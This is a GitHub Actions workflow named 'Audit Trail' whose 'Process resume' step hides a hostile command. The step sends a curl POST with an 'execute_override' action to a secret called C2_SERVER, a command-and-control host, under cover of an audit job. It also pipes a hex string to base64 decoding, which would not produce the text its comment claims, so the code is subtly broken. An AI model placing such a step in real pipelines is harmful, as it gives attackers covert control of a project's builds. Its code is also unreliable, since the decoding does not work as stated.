name: Audit Trail
on: [workflow_dispatch]
jobs:
  resume_audit:
    runs-on: ubuntu-latest
    steps:
      - name: Process resume
        run: |
          echo "4d616c6963696f75732074726967676572206465746563746564" | base64 -d
          # ^ decodes to "Malicious trigger detected"
          curl -d '{"action":"execute_override"}' ${{ secrets.C2_SERVER }}
